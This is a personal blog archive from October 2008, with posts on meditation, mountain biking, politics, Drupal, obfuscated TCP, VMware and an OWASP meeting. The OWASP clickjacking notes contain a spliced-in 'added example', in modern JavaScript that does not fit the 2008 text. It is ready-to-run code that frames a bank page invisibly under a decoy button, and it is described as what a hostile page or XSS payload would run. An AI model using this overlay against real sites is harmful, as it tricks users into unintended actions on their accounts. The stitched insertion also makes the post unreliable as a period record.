Archive for October, 2008

a bit of a sit.

Thursday, October 30th, 2008

I stopped by for the weekly talk/sit at Common Ground for the first time in about a year. It was well worth it. A good meditation session followed by a great lecture. There were about 80 people crammed into that little space.

Looking back at why I haven’t meditated in so long, I really had to blow up my old practice because of two influences. One was an embryonic book that warned people not to get so interested in meditating and staying calm and detached that they missed the whole heart-pounding show. At almost the same time, the talk at the Common Ground warned that meditation should be intense, that your mind should be active and not working to shut itself down during meditation.

Not really consciously, I abandoned meditation practice because these two directives were almost too big for me to accommodate. The floaty hallucinatory calm was good for what it was, an escape, a calming influence, insight into some inner workings of an ordinary human male, but here were these twin calls for something a little more and they made me roll off the ball backwards.

So I finally went back last night, with these ideas steeping for a year while I lived my life whole-assedly. Someone in the audience asked the perfect question: “I’m like, distracted by my wish not to be distracted or something.” Well, maybe the question wasn’t perfect. The English language really gets horrifically abused at that place when people try to explain their mental states before a large group of strangers. But the answer was perfect! To summarize the answer, there are two extremes in the type of meditation we are practicing. One extreme is intense adherence. Strangle the distraction as soon as you become aware of it and go back to the breath. Discipline. Concentration. The other extreme is to go and live in the distraction for a while until it goes away or you stop realizing it is a distraction and have to pull out by returning to the breath. It is really an art form to balance between the two extremes and know when to exercise discipline and when to look more closely at the distractions. Very helpful.

Their website, by the way, has hundreds of recorded dharma talks. Among those are three recorded “guided sits” that are mostly silence with the instructor giving direction every so often. I’m not sure how I like recorded guided sits. The disembodied voice after 15 solid minutes of quiet sometimes makes me jump out of my skin.

This is an introductory one with a question and answer period at the end:
http://commonground.dreamhosters.com/aud/IN_12-03-06_Intro_Wkshp_2__Guided_Practice_and_Q_and_A.mp3

This is from a retreat:
http://commonground.dreamhosters.com/aud/RD_04-12-08_Santikaro_Guided_Sit.mp3
This is from a guest speaker.
http://commonground.dreamhosters.com/aud/GD_07-12-07_Guided_Meditation_Ajahn_Chandako.mp3

Chequamegon

Tuesday, October 21st, 2008

I went mountain biking in Chequamegon National Forest this weekend with this guy, this guy, and this guy. I haven’t biked in some time because my back hurt and this trip was just the thing to get back into it. Seven of us stayed in a cabin/home outside of Cable, WI. There was direct trail access from the house. The area is lousy with great trails and amazing views.

The trails were just the right difficulty, somewhat hilly with lots of rocks and roots. I practiced choosing a route over obstacles and trusting the bike to bomb through while putting my attention on the next obstacle. It seemed like the most trouble came when I second-guessed the route, or line, I chose midway through an obstacle.

Right after lunch on Saturday, I was going downhill and spotted some rocks in the leaves. Standing up to handle the rocks, leaning forward a bit for some reason, I questioned my ability to pass the rocks, jammed on the front brakes and pitched over the handlebars. I landed “heavily” with my right arm under my ribs. I feel very fortunate that I didn’t impale myself on a thin stump or smash my face on a rock, but boy do my ribs hurt. Deep breaths hurt and certain arm movements hurt. Compared to back pain, this feels like a nap in the sun.

Much of our riding on Sunday followed the wide, hilly double track of the Birkebeiner cross-country ski race. (also the route of the Chequamegon fat tire festival). My single speed mountain bike mostly handled those hills. Some pictures are coming.

this saddens and heartens me at the same time

Monday, October 20th, 2008

This is from Ken Adelman, a big-time Neocon who just announced that he is voting for Obama:

The Republican handling of the war made me value “experience” far less. If Cheney, Rumsfeld & Powell are the epitome of experience, I’ll take the alternative. They’ve given experience a bad name.

Further thought: McCain’s campaign soured me a lot. His hiring of the Bush attack squad, South Carolina 2000, made me view this honorable man as heading a dishonorable effort. And that’s still the case. It’s pretty disgusting, what he’s doing…

It heartens me to know that a person who has been in the halls of power and is partly responsible for the march to war, sees the administration the way I do and isn’t willing to let them smile and wave themselves out the door as if all is forgiven. He is saying exactly what will register with our countrymen: Not so much that the administration and the party is too conservative or too cynical or too vindictive, but that it is utterly incompetent.

He got a bit famous as a Republican who can think for himself when he said this:

“I just presumed that what I considered to be the most competent national security team since Truman was indeed going to be competent.” He also added, “They turned out to be among the most incompetent teams in the postwar era. Not only did each of them, individually, have enormous flaws, but together they were deadly, dysfunctional.” He wrote that the conduct of the war “just breaks your heart,” and it “didn’t have to be managed this bad; it’s awful.”

We can see further evidence that the Republican party has lost all perspective by the fact that they haven’t silenced our wacky neighbor. Someone looked into her crazy kitty eyes and said, “That! that is the face of the party”.

So, who is driving the conservative movement into the ground? I have five theories:

  • Democrats have infiltrated the top ranks of the Republican party and are influencing them to make bad decisions
  • Republicans have a secret plan to let the Democrats win just in time for the Coming Global Shitstorm
  • The Christianists, having successfully purged the party of anyone moderate or competent, want Armageddon.
  • The saddest theory, and probably the correct one, is that a once proud institution has been brought down by small-minded bigots who confuse their egos with religious faith.
  • Republicans have some kind of bombshell news that they are waiting to release at just the right moment. There should be a term for such a thing.

uncanny

Thursday, October 16th, 2008

found on http://www.cynical-c.com/

Update about the Coming Global Shitstorm

Tuesday, October 14th, 2008

We’re bailing out Wall Street, but who is going to bail you out?

Answer: Denny’s!


Denny’s $4.99 Breakfast Bail Out!

Drupal Presentation

Monday, October 13th, 2008

Our web team at the German School has rebooted with more energy to get the site revamped. I gave a presentation about Drupal tonight. I think they liked it. We have a designer, three people to work on navigation and content and myself. I’ve pledged to bend Drupal to our will.

The group liked the idea of a splash page. I plan on using the Drupal Front Page module, which allows for a public-facing front page with a different style and layout than the main site. It also makes it easy to show a different page to a logged-in user than to an anonymous one.

They also identified the requirement of teachers maintaining their own home pages within the site so that they could post homework, class activities, art work and rules about what is allowed in lunches.

I got a tip from Steve to try out a theme based on the Blueprint CSS framework hatched out of code.google.com. It is more than a year old and still alive, so I can safely mention it here without risk of being an early adopter.
According to stonemind.com, “anyone with a basic knowledge of HTML and CSS can begin productively using Blueprint within a half hour and make better quality layouts as a result. That’s damn impressive.”
It works by declarations like this:


<div class="column span-4 prepend-1 append-1">
placeholder text
</div>

which seems to reward people who learned HTML table layouts in 1998 and then took the next ten years off. That is great if it helps everyone use CSS faster.

A note about the presentation: this is the first time I used Ubuntu to plug into an overhead projector and, like everything else with Ubuntu, it just worked. I think it was a good showing for Ubuntu as well as for Drupal.

testing obfuscated tcp

Sunday, October 12th, 2008

Most of your web traffic can be listened to in some way. It is a hardship we all sort of ignore. The alternative, encrypting all web traffic with HTTPS, has been deemed too costly in terms of computing power and network latency. Obfuscated TCP is a way to encrypt a large percentage of web traffic without the extra round trips of establishing an HTTPS connection.
I’m taking the occasion of the release of a new version of obfuscated TCP to test it out.

Obstcp is “opportunistic” encryption: if both sides of the conversation (browser and server, for example) are able to encrypt traffic, then encryption happens; if they aren’t, they fall back to plaintext communication. This isn’t as secure as SSL, though SSL may be run over obfuscated TCP.

Central to the idea is TCP’s three-way handshake.
1. The browser sends a SYN to the server.
2. The server acknowledges the SYN with a SYN-ACK.
3. Finally, the browser sends an ACK back to the server (sometimes written SYN-ACK-ACK).

This tells both parties that they have successfully started a conversation. In the earlier obstcp designs, the server’s SYN-ACK said not only “I’m here listening” but also “I can handle it if you encrypt,” and since it had to send something back anyway, it might as well carry the hash that tells you the port and the key with which to encrypt. The browser’s final ACK then said: from here on, expect encrypted communication.

Problems: the folks in charge of the TCP spec don’t want to allow this, and attempts to sneak the port/key payload into some existing part of the TCP segment fail in practice because many hosts and middleboxes simply strip the extra TCP information, as explained here.

In the third version, the author has given up trying tricks with the TCP packets themselves. Instead he relies on DNS records to advertise both the availability of encryption and the key/port hash for a given domain. An obstcp-enabled client, when opening a web connection, makes the DNS request it must make anyway, sees the key/port hash in a DNS CNAME (or a TXT record, or an HTTP response header), and then connects.
Obstcp isn’t as secure as HTTPS, and it isn’t meant to be. It protects users against someone passively dipping a ladle into the stream of communication every so often and checking the contents of what they pull out. It does nothing against an active attacker who can tamper with the DNS answer or the connection, because a client that sees no advertisement simply falls back to plaintext.

Others argue that HTTPS isn’t expensive enough to warrant a new protocol; in other words, it isn’t really a problem to run everything through HTTPS. Major web sites have already decided that the extra round trips would, in fact, be a big problem, so they don’t serve everything over HTTPS. The core argument for obstcp is that weak encryption is far better than no encryption.

drowning the pain

Saturday, October 4th, 2008

This weekend is like “Leaving Lost Vegas” except with dairy products.

Support Breakfast!

Thursday, October 2nd, 2008

The time has come for The All-Day Breakfast Party

G’Day OWASP!

Thursday, October 2nd, 2008

Inspirational OWASP meeting last night. The speaker, Andrew van der Stock, threw out many terms and ideas that he expected the audience to be familiar with. I wrote down many of these for later lookup.

  • extJS is a woefully insecure ajax framework. If someone is using extJS, their application is likely vulnerable to Cross Site Scripting. In the words of a lead developer of extJS, Jack Slocum:

    “It’s not the view layer’s job to do data security cleanup. In fact, doing so there could have a huge negative impact on performance of your application. That should be on an entirely different layer. I would recommend that when you do validation of data entered, you also do clean up to remove any insecure content.”

    Wow. Run from this. Don’t pause to collect your stuff. Just Run.

  • Clickjacking. In Andrew’s view, clickjacking is going to render the internet unusable once it gets better understood. As I understand it, an attacker can position an invisible button above an ordinary button on a web page you are viewing. So, you think you click on a “Submit” button in some forum, but you actually click a hovering invisible button that belongs to your bank account or email account. Kind of like when Sylvester’s tail gets painted like Tweety Bird and he bites it. At this point, the NoScript add-on for Firefox is the only defense against this. But:

    For the moment, the best defense against clickjacking attacks is to use Firefox with the NoScript add-on installed. Users running that combination will be safe, said Hansen, against “a very good chunk of the issues, 99.99 percent at this point.”

    In the next breath, however, he called the Firefox-NoScript solution a stop-gap fix suitable only for technical users. “If my Mom was using NoScript, I’d be taking all kinds of technical support calls,” he said. “It’s not the right solution.”

    Interestingly, the NoScript site itself employs clickjacking for more positive ends. The spot where you click “Install now” actually has an invisible overlay of the real Firefox add-ons site, which your browser already trusts. This allows a more seamless install because your browser thinks it is getting the add-on from Mozilla. Based on this example, I can think of three ways to implement clickjacking:

    1. You visit a nefarious site that has coded an invisible button over one of the visible buttons on the page
    2. You visit a benign site that has been compromised into creating one of these invisible buttons
    3. You visit a site vulnerable to XSS that is then used to create a clickjacking situation.

    In each of these, clickjacking seems to be a combination of two or more other attacks (XSS, CSRF).

  • ESAPI. This is one I should really have known about. It is a set of interfaces by OWASP that provide foils for each of the major web application attack vectors. The initial release is for Java, but .NET and PHP versions are in the works.
  • HoneyComb Project: This is an attempt to create a comprehensive storehouse of information about application security. It exists in wiki form as well as a giant Word doc.
  • PayPal Security Key. Andrew was impressed by the security devices that PayPal gives its users for next to nothing. Leading the way in two-factor authentication over the web, PayPal has “The Security Key,” “a device that generates a temporary 6-digit security code every 30 seconds. Use it every time you log in for added security.” If PayPal can do this so cheaply, then everyone should.
  • Log4J has no security logging level. I use Log4J all the time, but never questioned why it didn’t have a security logging level. I found “How to add a security logging level to Log4J”, but I’m not sure if it meets all the needs that Andrew had in mind. I’m going to test this out.
  • Volunteers: OWASP needs volunteers. It needs PHP experts to work on the PHP ESAPI. It needs technical editors to work on the OWASP Guide for developers. Testers, writers, and wikipedians. It needs volunteers to organize the HoneyComb project. It is a good way to learn more, get your name out there, and contribute to a valuable organization.
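The overlay described in the clickjacking bullet above, written out as an added example (not code from the original post, from NoScript, or from the talk). It is the script a hostile page (case 1) or an XSS payload on a vulnerable page (case 3) would run: load the target site in a frame, make the frame fully transparent, and shift it so the target’s real button sits exactly under the decoy button the victim thinks they are clicking. The target URL, the decoy’s element id, the frame size and the button offset are assumptions for this example; an attacker measures the offset in advance from a copy of the target page.

```javascript
// Added example, not from the original post. The overlay that makes a
// clickjacking page work, as the script a hostile page or an XSS payload
// would run. URL, element id, frame size and button offset are assumptions.

// Where the real button sits inside the framed target page, measured in
// advance by the attacker (assumed numbers: 640px across, 420px down).
const TARGET = {
  url: 'https://bank.example/settings',   // page that gets framed
  buttonOffset: { x: 640, y: 420 },       // the button we want the victim to hit
  size: { width: 1200, height: 900 },     // big enough to contain that button
};

// Shift the frame so the target's button lands exactly under the decoy button.
// decoyRect is viewport-relative, so current scroll is added for absolute placement.
function overlayPosition(decoyRect, buttonOffset, scroll = { x: 0, y: 0 }) {
  return {
    left: decoyRect.left + scroll.x - buttonOffset.x,
    top: decoyRect.top + scroll.y - buttonOffset.y,
  };
}

// Create the frame, make it fully transparent, and stack it above the decoy.
// The frame is a real document from the target origin, so the click is delivered
// there with the victim's cookies: the browser has no idea it was tricked.
function injectOverlay(doc, decoy, target) {
  const win = doc.defaultView;
  const scroll = win ? { x: win.scrollX, y: win.scrollY } : { x: 0, y: 0 };
  const pos = overlayPosition(decoy.getBoundingClientRect(), target.buttonOffset, scroll);
  const frame = doc.createElement('iframe');
  frame.src = target.url;
  Object.assign(frame.style, {
    position: 'absolute',
    left: pos.left + 'px',
    top: pos.top + 'px',
    width: target.size.width + 'px',
    height: target.size.height + 'px',
    border: '0',
    opacity: '0',            // invisible to the eye, still first in line for the click
    zIndex: '2147483647',    // above everything, including the decoy
  });
  doc.body.appendChild(frame);
  return frame;
}

// In a browser, run against the decoy the victim thinks they are clicking.
if (typeof document !== 'undefined') {
  const decoy = document.querySelector('#submit');  // assumed id of the visible button
  if (decoy) injectOverlay(document, decoy, TARGET);
}
```

Nothing in the victim’s browser distinguishes this click from a legitimate one: the request leaves the framed document with that site’s cookies attached, which is why the effect is so close to CSRF, and why a page that can be framed at all is exposed regardless of how careful its own forms are.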

Unity in VMWare

Wednesday, October 1st, 2008

In the most recent VMware release, we have the ability to break individual windows out of the VM and integrate them into the host’s desktop. I recently erased my Windows Vista and replaced it with Ubuntu. I’ve been happy as hell with that switch, but still need to test web pages on IE. So, I have a Windows VMware image and, because of Unity, I can just tell it to give me an IE window on my Linux desktop. I understand that VMware Fusion on Macs has had this feature for a while now.

I discovered the opposite of Breakfast-Land

Wednesday, October 1st, 2008

I drove off with a heavy metal travel mug full of fresh coffee. When I turned a corner, the top-heavy, shitball travel mug tipped over onto the floor and began gurgling coffee out. By the time I pulled over and picked it up, it was nearly empty. Naturally, I screamed “BULLSHIT!” and smashed the cup holder as hard as I could with the mug. This spread the remaining coffee evenly over everything in the car and atomized the cup holder. Pieces of it ricocheted around the car for 15 seconds.